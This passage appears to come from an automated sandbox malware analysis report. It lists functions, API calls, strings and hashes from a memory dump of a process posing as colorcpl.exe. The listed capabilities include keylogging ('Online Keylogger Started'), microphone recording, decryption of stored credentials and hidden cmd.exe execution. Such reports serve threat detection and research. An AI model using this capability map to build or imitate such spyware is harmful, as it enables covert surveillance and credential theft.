                                                                • Part of subcall function 030D3C92: GetLastError.KERNEL32(?,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?,?), ref: 030D3CBA
                                                              • _free.LIBCMT ref: 030D6AB8
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                              • String ID:
                                                              • API String ID: 1286116820-0
                                                              • Opcode ID: a96d5b0b9666dcacbf3e43c29fa8ab43c71dfd93116c83baf6b61b4584d9b23a
                                                              • Instruction ID: 43b1147c82912ccd9ec06ba926dd7c588ad47daa8539ec5ee06bcfabd4436582
                                                              • Opcode Fuzzy Hash: a96d5b0b9666dcacbf3e43c29fa8ab43c71dfd93116c83baf6b61b4584d9b23a
                                                              • Instruction Fuzzy Hash: E751D77590231EEFCB10EFA9DC809AEF7FCEF41310B5402AAE4559B694E7369940CB50
                                                              Function 030D12F9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 4c4f48fbdf77350c5fe314ecaad07e633de2b7878cd5e24dc1898319db3719e0
                                                              • Instruction ID: fd8c860acacacf1b03e5cd71a08744582662fb1fab6bbf8ccdc56f2ecbf64bef
                                                              • Opcode Fuzzy Hash: 4c4f48fbdf77350c5fe314ecaad07e633de2b7878cd5e24dc1898319db3719e0
                                                              • Instruction Fuzzy Hash: 2041B236E02304AFDB18DF78C884A9DB7F6EF85710B1945A9EA55EF640DB31E901CB80
                                                              Function 030DE30C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(03101E78,00000000,?,?,00000000,00000000,030C988A,?,00000000,03101E78,00000001,?,?,00000001,030C988A), ref: 030DE359
                                                              • __alloca_probe_16.LIBCMT ref: 030DE391
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 030DE3E2
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,030C8C3F,?), ref: 030DE3F4
                                                              • __freea.LIBCMT ref: 030DE3FD
                                                                • Part of subcall function 030D3649: RtlAllocateHeap.NTDLL(00000000,030C3069,?,?,030C65E7,?,?,?,?,?,0309C88A,030C3069,?,?,?,?), ref: 030D367B
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                              • String ID:
                                                              • API String ID: 313313983-0
                                                              • Opcode ID: 0fb2fd09fb7647f5b0b965d4e1e67e8e02e9066c558a0b2f12216ef6780c2557
                                                              • Instruction ID: e2bbe777b9108692c4904123ccf3811bfdc45c686df0875b227a2f161f74d6ac
                                                              • Opcode Fuzzy Hash: 0fb2fd09fb7647f5b0b965d4e1e67e8e02e9066c558a0b2f12216ef6780c2557
                                                              • Instruction Fuzzy Hash: 88318D72A1231AABDF25DF69DC88DFE7BE5EF40610B084168EC05DE290E739D950CB94
                                                              Function 03091BC9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 03091BD9
                                                              • waveInOpen.WINMM(030FFAB0,000000FF,030FFA98,Function_00001CEB,00000000,00000000,00000024), ref: 03091C6F
                                                              • waveInPrepareHeader.WINMM(030FFA78,00000020), ref: 03091CC3
                                                              • waveInAddBuffer.WINMM(030FFA78,00000020), ref: 03091CD2
                                                              • waveInStart.WINMM ref: 03091CDE
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                              • String ID:
                                                              • API String ID: 1356121797-0
                                                              • Opcode ID: 0d19602e6f8d91825e5490605bb74e74f9fae19e18eb77aa73627bcd33fc9a16
                                                              • Instruction ID: 197b809cb23aa72a0cb5ec22ea035785c64cc77c5c055556a74bd70af535671e
                                                              • Opcode Fuzzy Hash: 0d19602e6f8d91825e5490605bb74e74f9fae19e18eb77aa73627bcd33fc9a16
                                                              • Instruction Fuzzy Hash: 4F214AF6603207AFD718FF25B81495A7BA5EB98F10700422AA205DBEA8DBBC4401DB04
                                                              Function 030DC53A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 030DC543
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 030DC566
                                                                • Part of subcall function 030D3649: RtlAllocateHeap.NTDLL(00000000,030C3069,?,?,030C65E7,?,?,?,?,?,0309C88A,030C3069,?,?,?,?), ref: 030D367B
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 030DC58C
                                                              • _free.LIBCMT ref: 030DC59F
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 030DC5AE
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 5146da218e0b25e975825ec037f09a3ba724ed638471fb6643b77df3aa8e3080
                                                              • Instruction ID: 0b14a51f5978dcd864803b0eaf3fe599846d2112c1581f853d9cb79c76ffb7ef
                                                              • Opcode Fuzzy Hash: 5146da218e0b25e975825ec037f09a3ba724ed638471fb6643b77df3aa8e3080
                                                              • Instruction Fuzzy Hash: CF01D8767037157F3721D6AB6C4CCBF6AEDCAC6EA03180169F904C6108DE659D41C5B0
                                                              Function 0309FBC8 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0309FBD5
                                                              • int.LIBCPMT ref: 0309FBE8
                                                                • Part of subcall function 0309CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0309CAFA
                                                                • Part of subcall function 0309CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0309CB14
                                                              • std::_Facet_Register.LIBCPMT ref: 0309FC28
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0309FC31
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0309FC4F
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                              • String ID:
                                                              • API String ID: 2536120697-0
                                                              • Opcode ID: 48749681d6acca856660be0da7958483850db7c38e0d396f7a914b38dfc0ce57
                                                              • Instruction ID: 7c379e02b5e997e1146388a7cd18f277bd1f8a6eb93da49b9bc8bddf07ea979f
                                                              • Opcode Fuzzy Hash: 48749681d6acca856660be0da7958483850db7c38e0d396f7a914b38dfc0ce57
                                                              • Instruction Fuzzy Hash: CB11067A912319ABDF24FBA4D5048DEB7A8DF84260B14859BEC10EF250DE70DE42D7D0
                                                              Function 030D57A9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00000000,00000000,030C9A11,00000000,?,?,030C9A95,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 030D57AE
                                                              • _free.LIBCMT ref: 030D57E3
                                                              • _free.LIBCMT ref: 030D580A
                                                              • SetLastError.KERNEL32(00000000), ref: 030D5817
                                                              • SetLastError.KERNEL32(00000000), ref: 030D5820
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 2237fc242f810dba63741aa3e9fdc965915c17a1b2d1ff1c2ded4e29782abe85
                                                              • Instruction ID: 3e81b4561523ffd2b571c93164998a2a378ee30156b640974c4d5fee7bb0d220
                                                              • Opcode Fuzzy Hash: 2237fc242f810dba63741aa3e9fdc965915c17a1b2d1ff1c2ded4e29782abe85
                                                              • Instruction Fuzzy Hash: 4D01493A243B056BC312F538BC88E6F26DDDBC3A71B354064FC16AA140EF3988018731
                                                              Function 030DDB9C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 030DDBB4
                                                                • Part of subcall function 030D3C92: RtlFreeHeap.NTDLL(00000000,00000000,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?), ref: 030D3CA8
                                                                • Part of subcall function 030D3C92: GetLastError.KERNEL32(?,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?,?), ref: 030D3CBA
                                                              • _free.LIBCMT ref: 030DDBC6
                                                              • _free.LIBCMT ref: 030DDBD8
                                                              • _free.LIBCMT ref: 030DDBEA
                                                              • _free.LIBCMT ref: 030DDBFC
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: e5f479ed867e8adfd287ec645889495a282beb6b2ea523057e7d13095bba3b77
                                                              • Instruction ID: 547d8d103ad0f9726b01a75fb204513746efc68871076ff90d2e6c8f2fb94654
                                                              • Opcode Fuzzy Hash: e5f479ed867e8adfd287ec645889495a282beb6b2ea523057e7d13095bba3b77
                                                              • Instruction Fuzzy Hash: C1F09036603314EF9660FA6DE589E6AF3DAFF407617699845F085DB900CF38F8808B61
                                                              Function 030D1548 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 030D1566
                                                                • Part of subcall function 030D3C92: RtlFreeHeap.NTDLL(00000000,00000000,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?), ref: 030D3CA8
                                                                • Part of subcall function 030D3C92: GetLastError.KERNEL32(?,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?,?), ref: 030D3CBA
                                                              • _free.LIBCMT ref: 030D1578
                                                              • _free.LIBCMT ref: 030D158B
                                                              • _free.LIBCMT ref: 030D159C
                                                              • _free.LIBCMT ref: 030D15AD
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 0ef2b81e105a104f0d560a1e49210758bbad6814b0ad9e697aaed95e205fdbed
                                                              • Instruction ID: 166a430fa9ff8e781216c596963dabe0d3510c6a48753aea9fef679b2969613b
                                                              • Opcode Fuzzy Hash: 0ef2b81e105a104f0d560a1e49210758bbad6814b0ad9e697aaed95e205fdbed
                                                              • Instruction Fuzzy Hash: 12F03AB99033218FC641FF24F8456493BE1F704B61306968AF4599AE68CF3E4942CFA5
                                                              Function 030A2446 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 030A24AD
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 030A24DC
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 030A257C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Enum$InfoQueryValue
                                                              • String ID: [regsplt]
                                                              • API String ID: 3554306468-4262303796
                                                              • Opcode ID: a5514f0dd06119a18e7f6e3935953f1b6dee61b94da1feb7a1ddef2d9e1cf3c5
                                                              • Instruction ID: 9aba56421d944c49ee4b63219f6ae2f1bacd7f2f0267994e215640f043e573e5
                                                              • Opcode Fuzzy Hash: a5514f0dd06119a18e7f6e3935953f1b6dee61b94da1feb7a1ddef2d9e1cf3c5
                                                              • Instruction Fuzzy Hash: BB513F75A0121DAEEF14EBE4DC90EEFB7BCBF44200F100566E505AA191EF706B49DBA0
                                                              Function 030DB8C9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _strpbrk.LIBCMT ref: 030DB918
                                                              • _free.LIBCMT ref: 030DBA35
                                                                • Part of subcall function 030C9AA3: IsProcessorFeaturePresent.KERNEL32(00000017,030C9A75,?,?,?,00000000,?,00000000,?,?,030C9A95,00000000,00000000,00000000,00000000,00000000), ref: 030C9AA5
                                                                • Part of subcall function 030C9AA3: GetCurrentProcess.KERNEL32(C0000417), ref: 030C9AC7
                                                                • Part of subcall function 030C9AA3: TerminateProcess.KERNEL32(00000000), ref: 030C9ACE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                              • String ID: *?$.
                                                              • API String ID: 2812119850-3972193922
                                                              • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                                              • Instruction ID: c85cbcf84eeab447b478f0edaf816672991371d8f73e2127238d18941aa0dc28
                                                              • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                                              • Instruction Fuzzy Hash: B9518275E013099FDF14DFA9C880AEDFBF9EF88314F2581A9E455E7340EA759A018B50
                                                              Function 030D0935 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\colorcpl.exe,00000104), ref: 030D0975
                                                              • _free.LIBCMT ref: 030D0A40
                                                              • _free.LIBCMT ref: 030D0A4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Windows\SysWOW64\colorcpl.exe
                                                              • API String ID: 2506810119-1707929182
                                                              • Opcode ID: a50c7169cc900aab77d0a659abaf36c5b0ff68aebe0937ccaca3090fe34da965
                                                              • Instruction ID: 3a93d77e356cc8bd9e97d8d5a90d64c4a9d018721f0a4df78193780139ca104f
                                                              • Opcode Fuzzy Hash: a50c7169cc900aab77d0a659abaf36c5b0ff68aebe0937ccaca3090fe34da965
                                                              • Instruction Fuzzy Hash: 15319475A02359EFDB21EF99D8C4ADEFBFCEF85710F1440AAE4099B200D6B18A45CB51
                                                              Function 030A9675 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030A2006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,03102248,03101FFC), ref: 030A2030
                                                                • Part of subcall function 030A2006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 030A204B
                                                                • Part of subcall function 030A2006: RegCloseKey.ADVAPI32(00000000), ref: 030A2054
                                                                • Part of subcall function 030A9F23: GetCurrentProcess.KERNEL32(?,?,?,0309C663,WinDir,00000000,00000000), ref: 030A9F34
                                                              • _wcslen.LIBCMT ref: 030A9744
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                              • String ID: .exe$program files (x86)\$program files\
                                                              • API String ID: 37874593-1203593143
                                                              • Opcode ID: 37ca558601e52cceede0bb14b1daa5061802a2e41bfbccc5c1746aa637fd865e
                                                              • Instruction ID: a89e943e5b2d317368d879ddb3470a3ca1f24fc2665a3d0253d5d4d6314e0280
                                                              • Opcode Fuzzy Hash: 37ca558601e52cceede0bb14b1daa5061802a2e41bfbccc5c1746aa637fd865e
                                                              • Instruction Fuzzy Hash: 0C214766B023087BEF18FBF89C959FE76AD9AC5110704053EE505AF281EE254D099261
                                                              Function 0309A0B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?,?,00000000), ref: 0309A0BE
                                                              • wsprintfW.USER32 ref: 0309A13F
                                                                • Part of subcall function 0309962E: SetEvent.KERNEL32(?,?,?,0309A77B,?,?,?,?,?,00000000), ref: 0309965A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EventLocalTimewsprintf
                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                              • API String ID: 1497725170-1359877963
                                                              • Opcode ID: 17e171a51b098ea476668ee586987b6286fb3fab3f20b50a9d76b310eb29bd73
                                                              • Instruction ID: 66ef7f9a3f6ee9f071df7a05e53bed5aa4764a50eb643d3b5ea4b7255a6967a8
                                                              • Opcode Fuzzy Hash: 17e171a51b098ea476668ee586987b6286fb3fab3f20b50a9d76b310eb29bd73
                                                              • Instruction Fuzzy Hash: 8211547A50521CAADB0DFB95EC548FE77BCEE98310B00011FF4065A580EF786A46D6A4
                                                              Function 03099E37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0309A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0309A0BE
                                                                • Part of subcall function 0309A0B0: wsprintfW.USER32 ref: 0309A13F
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 03099EB7
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 03099EC3
                                                              • CreateThread.KERNEL32(00000000,00000000,0309931D,?,00000000,00000000), ref: 03099ECF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                              • String ID: Online Keylogger Started
                                                              • API String ID: 112202259-1258561607
                                                              • Opcode ID: 408ac7a68a2647dad38a243d17482498b844ec2428f70faffc0b1e38a15d10d6
                                                              • Instruction ID: acb5a65b6f1d2736d2d4fef16535c904cfe04e7c946493e84c0939db379a72f7
                                                              • Opcode Fuzzy Hash: 408ac7a68a2647dad38a243d17482498b844ec2428f70faffc0b1e38a15d10d6
                                                              • Instruction Fuzzy Hash: 6B01D6A8B0230C3EFE20F6759CC6DFF7A6CCAC2198B44045EF5451A142DA552C0592F6
                                                              Function 03096071 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,03096039,?,00000000), ref: 03096090
                                                              • GetProcAddress.KERNEL32(00000000), ref: 03096097
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: CryptUnprotectData$crypt32
                                                              • API String ID: 2574300362-2380590389
                                                              • Opcode ID: 765b10216c6b962b2eac5ea91eabc2bddccaed10e2e63c6e7271daca92e4dc80
                                                              • Instruction ID: 804de7ca4d6aed6c37d390080d295c6efeb2183ab5e66125f7b789cb2d74332d
                                                              • Opcode Fuzzy Hash: 765b10216c6b962b2eac5ea91eabc2bddccaed10e2e63c6e7271daca92e4dc80
                                                              • Instruction Fuzzy Hash: 43016D35A0220AAFDF14CFB9D8949AFBBF8EB44110B0402AFD954C3600C736D400C790
                                                              Function 0309513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,03095139), ref: 03095153
                                                              • CloseHandle.KERNEL32(?), ref: 030951AA
                                                              • SetEvent.KERNEL32(?), ref: 030951B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEventHandleObjectSingleWait
                                                              • String ID: Connection Timeout
                                                              • API String ID: 2055531096-499159329
                                                              • Opcode ID: 27fb17995ff3a095add8a318cc7ffa479a1081d5090fef0f1ccb318d5f3bfe27
                                                              • Instruction ID: 7b285ca99e40ceb99d445460b21304b71276e8c597837ebe38a823484d2e4ac8
                                                              • Opcode Fuzzy Hash: 27fb17995ff3a095add8a318cc7ffa479a1081d5090fef0f1ccb318d5f3bfe27
                                                              • Instruction Fuzzy Hash: 22014735A43F00AFFB22FB7A9C5046ABBD9FF426013040D1FD1D34AA21CB65A400EB41
                                                              Function 0309D1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0309D25E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8Throw
                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                              • API String ID: 2005118841-1866435925
                                                              • Opcode ID: c06a4d444fba98b76700574326d862b41e10dcfa53711e82896e0314b9d439cb
                                                              • Instruction ID: de93807460d4e416b9808a75529d6a8ec976ac8dbb0896008b3f649849bd847e
                                                              • Opcode Fuzzy Hash: c06a4d444fba98b76700574326d862b41e10dcfa53711e82896e0314b9d439cb
                                                              • Instruction Fuzzy Hash: 5E01F966AC730C7EFF54E794DC13FFDB3A89B70640F048447AA216E4C1DA71A609E621
                                                              Function 030A4839 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 030A487B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExecuteShell
                                                              • String ID: /C $cmd.exe$open
                                                              • API String ID: 587946157-3896048727
                                                              • Opcode ID: a33dfdf755505942cdfdf6dee8e77076fa567e419d2c38f3fb5c6183f6a95955
                                                              • Instruction ID: 0a7b840a40e8e38d8df6399147ac8f8ef082c5b89ee199109d6b881bb862be29
                                                              • Opcode Fuzzy Hash: a33dfdf755505942cdfdf6dee8e77076fa567e419d2c38f3fb5c6183f6a95955
                                                              • Instruction Fuzzy Hash: 1BF0127534A3095FDA08FBB4DCA0DEFB398ABE0110F400D2FA1968A591EF349909D611
                                                              Function 030A2006 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON
                                                              Download Yara Rule
                                                              APIs
